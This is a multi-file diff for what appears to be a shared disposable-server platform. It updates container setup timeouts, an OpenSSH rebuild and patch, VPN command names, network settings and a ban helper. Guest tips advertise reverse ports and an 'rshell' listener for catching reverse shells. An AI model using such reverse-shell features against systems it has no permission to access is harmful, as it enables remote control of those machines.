-	[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull docker exec --user 0:0 "lg-${LID}" curl -s sf/port
+	[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull timeout 2 docker exec --user 0:0 "lg-${LID}" curl -s sf/port
 	# Warn user if this is the last server by IP (after semaphore has been released)
@ -1400,7 +1390,7 @@ exec_devnull docker exec sf-master /ready-lg.sh "${LID}" "${C_IP}" "${LG_PID}" "
 # Setup container (within container's namespace)
 unset WGNAME_UP
 [[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")"
-exec_devnull docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
+exec_devnull timeout 5 docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
 touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY"
 tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip"
--- a/host/mk_sshd.sh
+++ b/host/mk_sshd.sh
@ -11,11 +11,17 @@
 DSTDIR="/src/fs-root/usr/sbin"
 DSTBIN="${DSTDIR}/sshd"
 set -e
-SRCDIR="/tmp/openssh-9.2p1"
+SRCDIR="/src/dev/openssh-${VER:?}-sf"
 [[ ! -d "/src/dev" ]] && mkdir -p "/src/dev"
 cd /src/dev
 [[ ! -d "$SRCDIR" ]] && {
 	# Cloudflare to often returns 503 - "BLOCKED"
 	# wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
-	wget -O- https://artfiles.org/openbsd/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
+	wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"
 	tar xfz "openssh-${VER}.tar.gz"
 	mv "openssh-${VER}" "openssh-${VER}-orig"
 	tar xfz "openssh-${VER}.tar.gz"
 	mv "openssh-${VER}" "${SRCDIR}"
 	cd "$SRCDIR"
@ -39,5 +45,5 @@ strip sshd
 [[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}"
 cp sshd "${DSTBIN}"
 chmod 755 "${DSTBIN}"
-rm -rf "${SRCDIR:?}"
+# rm -rf "${SRCDIR:?}"
--- a/host/sf-sshd.patch
+++ b/host/sf-sshd.patch
@ -1,7 +1,7 @@
-diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-sf/channels.c
+diff -x !*.[ch] -u openssh-9.6p1-orig/channels.c openssh-9.6p1-sf/channels.c
--- openssh-9.2p1-orig/channels.c	2023-02-02 12:21:54
+--- openssh-9.6p1-orig/channels.c	2023-12-18 14:59:50
-+++ openssh-9.2p1-sf/channels.c	2023-08-15 06:13:05
+++ openssh-9.6p1-sf/channels.c	2024-01-20 17:50:15
-@@ -3639,7 +3639,7 @@
+@@ -3683,7 +3683,7 @@
 	ssh->chanctxt->IPv4or6 = af;
 }
@ -10,7 +10,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
 /*
  * Determine whether or not a port forward listens to loopback, the
  * specified address or wildcard. On the client, a specified bind
-@@ -3677,6 +3677,7 @@
+@@ -3721,6 +3721,7 @@
 			 * address and it was overridden.
 			 */
 			if (*listen_addr != '\0' &&
@ -18,10 +18,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
 			    strcmp(listen_addr, "0.0.0.0") != 0 &&
 			    strcmp(listen_addr, "*") != 0) {
 				ssh_packet_send_debug(ssh,
-diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1-sf/serverloop.c
+diff -x !*.[ch] -u openssh-9.6p1-orig/serverloop.c openssh-9.6p1-sf/serverloop.c
--- openssh-9.2p1-orig/serverloop.c	2023-02-02 12:21:54
+--- openssh-9.6p1-orig/serverloop.c	2023-12-18 14:59:50
-+++ openssh-9.2p1-sf/serverloop.c	2023-08-15 06:18:17
+++ openssh-9.6p1-sf/serverloop.c	2024-01-20 17:50:15
-@@ -102,6 +102,12 @@
+@@ -101,6 +101,12 @@
 /* requested tunnel forwarding interface(s), shared with session.c */
 char *tun_fwd_ifnames = NULL;
@ -34,7 +34,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
 /* returns 1 if bind to specified port by specified user is permitted */
 static int
 bind_permitted(int port, uid_t uid)
-@@ -391,8 +397,10 @@
+@@ -388,8 +394,10 @@
 			/* Clean up sessions, utmp, etc. */
 			cleanup_exit(255);
 		}
@ -46,7 +46,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
 		if (conn_in_ready &&
 		    process_input(ssh, connection_in) < 0)
 			break;
-@@ -637,12 +645,14 @@
+@@ -634,12 +642,14 @@
 	if (strcmp(ctype, "session") == 0) {
 		c = server_request_session(ssh);
@ -67,7 +67,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
 	}
 	if (c != NULL) {
 		debug_f("confirm %s", ctype);
-@@ -802,8 +812,20 @@
+@@ -799,8 +809,20 @@
 			ssh_packet_send_debug(ssh, "Server has disabled port forwarding.");
 		} else {
 			/* Start listening on the port */
@ -90,10 +90,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
 		}
 		if ((resp = sshbuf_new()) == NULL)
 			fatal_f("sshbuf_new");
-diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/sshd.c
+diff -x !*.[ch] -u openssh-9.6p1-orig/sshd.c openssh-9.6p1-sf/sshd.c
--- openssh-9.2p1-orig/sshd.c	2023-02-02 12:21:54
+--- openssh-9.6p1-orig/sshd.c	2023-12-18 14:59:50
-+++ openssh-9.2p1-sf/sshd.c	2023-08-15 06:13:05
+++ openssh-9.6p1-sf/sshd.c	2024-01-20 17:50:15
-@@ -536,8 +536,71 @@
+@@ -531,8 +531,71 @@
 		return 0;
 	}
 }
@ -165,7 +165,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/ss
 privsep_postauth(struct ssh *ssh, Authctxt *authctxt)
 {
 #ifdef DISABLE_FD_PASSING
-@@ -576,8 +639,34 @@
+@@ -571,8 +634,34 @@
 	reseed_prngs();
--- a/master/cgi-bin/rpc
+++ b/master/cgi-bin/rpc
@ -47,6 +47,23 @@ Sanitize()
 	[[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..."
 }
 InitColors() {
 	# COLOR is set (to 'always')
 	Y=$CDY
 	C=$CDC
 	R=$CDR
 	RR=$CR
 	G=$CDG
 	B=$CB
 	M=$CDM
 	YY=$CY
 	W=$CW
 	N=$CN
 	F=$CF
 	ICON_ERROR="💥 "
 	ICON_WARN="💥 "
 }
 GetFormVars()
 {
 	local IFS
@ -71,7 +88,6 @@ GetFormVars()
 		[[ ${key} == "config" ]] && {
 			R_CONFIG="${val//[^[:alnum:]-_+\/.]}"
 			[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG
 			[[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
 		}
 		[[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}"
 		[[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}"
@ -128,6 +144,9 @@ GetFormVars()
 			[[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}"
 		}
 	done
 	[[ -n $COLOR ]] && InitColors
 	[[ -n "$R_CONFIG" ]] && [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
 }
 # Load PID of WireGuard container
@ -685,9 +704,10 @@ BLPOP portd:response-${LID} 5" | redr) || return
 	# The PortD add's a /sf/run/self/reverse_forward.
 	echo -en "\
-${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N}
+${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} for details.
-${M}🤭 Tip${N}: Type ${C}rshell${N}
+${M}🤭 Tip${N}: Type ${C}rshell${N} to start listening.
-${G}👾 New reverse Port is ${Y}${ipport}${CN}"
+${M}🛜 Tip${N}: Type ${C}curl sf/port${N} to assign a new port.
 ${G}👾 Your reverse Port is ${Y}${ipport}${CN}"
 	# portd.sh automaticaly adds this to /config/self/reverse_*
 	exit
@ -807,22 +827,7 @@ cmd_wg_show()
 0<&- # Close STDIN
 Sanitize
 GetFormVars
-[[ -n $COLOR ]] && {
+
 	# COLOR is set (to 'always')
 	Y=$CDY
 	C=$CDC
 	R=$CDR
 	RR=$CR
 	G=$CDG
 	B=$CB
 	M=$CDM
 	YY=$CY
 	W=$CW
 	N=$CN
 	F=$CF
 	ICON_ERROR="💥 "
 	ICON_WARN="💥 "
 }
 [[ "${FCGI_CMD}" == "dmesg" ]] && {
@ -836,13 +841,13 @@ GetFormVars
 	# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)
 	[[ -n $SF_OVPN_HACK ]] && {
 		wg_net_init
-		[[ ${ARGS[1]} == 'vpn' ]] && {
+		[[ ${ARGS[1]} == 'ovpn' ]] && {
-			source "/sf/bin/funcs_vpn.sh"
+			source "/sf/bin/funcs_ovpn.sh"
-			[[ ${ARGS[2]} == 'up'   ]] && cmd_vpn_up
+			[[ ${ARGS[2]} == 'up'   ]] && cmd_ovpn_up
-			[[ ${ARGS[2]} == 'show'   ]] && cmd_vpn_show
+			[[ ${ARGS[2]} == 'show'   ]] && cmd_ovpn_show
-			[[ ${ARGS[2]} == 'del'  ]] && cmd_vpn_del
+			[[ ${ARGS[2]} == 'del'  ]] && cmd_ovpn_del
-			[[ ${ARGS[2]} == 'down' ]] && cmd_vpn_del
+			[[ ${ARGS[2]} == 'down' ]] && cmd_ovpn_del
-			cmd_vpn_help
+			cmd_ovpn_help
 			exit
 		} 
 	}
@ -869,14 +874,14 @@ wg_net_init
 	exit
 }
-[[ "${FCGI_CMD}" == "vpn" ]] && {
+[[ "${FCGI_CMD}" == "ovpn" ]] && {
-	source "/sf/bin/funcs_vpn.sh"
+	source "/sf/bin/funcs_ovpn.sh"
-	[[ ${ARGS[1]} == 'up'   ]] && cmd_vpn_up
+	[[ ${ARGS[1]} == 'up'   ]] && cmd_ovpn_up
-	[[ ${ARGS[1]} == 'show'   ]] && cmd_vpn_show
+	[[ ${ARGS[1]} == 'show'   ]] && cmd_ovpn_show
-	[[ ${ARGS[1]} == 'del'  ]] && cmd_vpn_del
+	[[ ${ARGS[1]} == 'del'  ]] && cmd_ovpn_del
-	[[ ${ARGS[1]} == 'down' ]] && cmd_vpn_del
+	[[ ${ARGS[1]} == 'down' ]] && cmd_ovpn_del
 	# [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show
-	cmd_vpn_help
+	cmd_ovpn_help
 	exit
 }
--- a/master/ready-lg.sh
+++ b/master/ready-lg.sh
@ -19,7 +19,9 @@ USER_UL_RATE="$5"
 LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt"
 # Create 'empty' for ZSH's prompt to show WG EXIT
-[[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
+# [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
 # Overwrite existing. Will be re-created by sf-setup.sh if WG-NET is up still. 
 :>"${LID_PROMPT_FN}"
 set -e
 LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}")
--- a/provision/env.example
+++ b/provision/env.example
@ -37,7 +37,7 @@ SF_MULLVAD_IP=172.20.0.252
 SF_MULLVAD_ROUTE=10.124.0.0/22
 SF_NOVPN_IP=172.20.0.240
 SF_NGINX_IP=172.20.1.80
-SF_RPC_IP=10.11.0.2
+SF_RPC_IP=100.126.224.2
 SF_GSNC_IP=172.22.0.21
 SF_SSHD_IP=172.22.0.22
 SF_DOH_IP=172.23.0.2
@ -49,9 +49,9 @@ SF_NET_ONION=10.111.0.0/16
 SF_NET_VPN=172.20.0.0/24
 SF_NET_VPN_DNS_IP=172.20.0.53
-SF_NET_LG=10.11.0.0/24
+SF_NET_LG=100.126.224.0/22
-SF_NET_LG_ROUTER_IP=10.11.0.1
+SF_NET_LG_ROUTER_IP=100.126.224.1
-SF_NET_LG_ROUTER_IP_DUMMY=10.11.0.254
+SF_NET_LG_ROUTER_IP_DUMMY=100.126.227.254
 SF_NET_VPN_ROUTER_IP=172.20.0.2
--- a/sfbin/funcs.sh
+++ b/sfbin/funcs.sh
@ -5,7 +5,7 @@ CY="\e[1;33m" # yellow
 CG="\e[1;32m" # green
 CR="\e[1;31m" # red
 CC="\e[1;36m" # cyan
-# CM="\e[1;35m" # magenta
+CM="\e[1;35m" # magenta
 CW="\e[1;37m" # white
 CB="\e[1;34m" # blue
 CF="\e[2m"    # faint
--- a/sfbin/funcs_admin.sh
+++ b/sfbin/funcs_admin.sh
@ -14,6 +14,7 @@ _self_for_guest_dir="${_sf_shmdir}/self-for-guest"
 _sf_basedir="/sf"
 _sf_dbdir="${_sf_basedir}/config/db"
 unset _sf_isinit
 _sf_region="$(hostname)"
 _sf_deinit()
 {
@ -507,27 +508,29 @@ lgrm()
 lgban()
 {
 	local fn
 	local hn
 	local ip
 	local msg
-	local lid
+	local lglid="${1}"
 	_sf_init
 	lid="${1}"
 	shift 1
-	fn="${_self_for_guest_dir}/${lid}/ip"
+	fn="${_self_for_guest_dir}/${lglid}/ip"
 	[[ -f "$fn" ]] && {
 		ip=$(<"$fn")
 		fn="${_self_for_guest_dir}/${lglid}/hostname"
 		[[ -f "${fn}" ]] && hn=$(<"${fn}")
 		fn="${_sf_dbdir}/banned/ip-${ip:0:18}"
 		[[ ! -e "$fn" ]] && {
 			[[ $# -gt 0 ]] && msg="$*\n"
-			echo -en "$msg" >"${fn}"
+			echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg" >"${fn}"
 		}
 		echo "Banned: $ip"
 	}
-	lgstop "${lid}" "$@"
+	lgstop "${lglid}" "$@"
-	#_sf_lgrm "${lid}" # Dont lgrm here and give user chance to explain to re-instate his server.
+	#_sf_lgrm "${lglid}" # Dont lgrm here and give user chance to explain to re-instate his server.
 	_sf_deinit
 }
--- a/sfbin/funcs_ovpn.sh
+++ b/sfbin/funcs_ovpn.sh
@ -6,7 +6,7 @@
 [[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80))
-cmd_vpn_help() {
+cmd_ovpn_help() {
    	echo -en "\
 Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N}
 Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N}
@ -241,7 +241,7 @@ vpn_stop() {
    nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null
 }
-cmd_vpn_show() {
+cmd_ovpn_show() {
    load_lg
    [[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && {
        echo -e "${C}"
@ -252,12 +252,12 @@ cmd_vpn_show() {
    exit
 }
-cmd_vpn_up() {
+cmd_ovpn_up() {
    local str
 	load_lg
    local link_mtu
-    [[ -z "$R_CONFIG" ]] && cmd_vpn_help
+    [[ -z "$R_CONFIG" ]] && cmd_ovpn_help
    WG_DEV="vpnEXIT"
    # echo "PID=$PID"
@ -379,7 +379,7 @@ Use ${C}curl sf/vpn/down${N} to disconnect.
    exit
 }
-cmd_vpn_del() {
+cmd_ovpn_del() {
    load_lg
    vpn_stop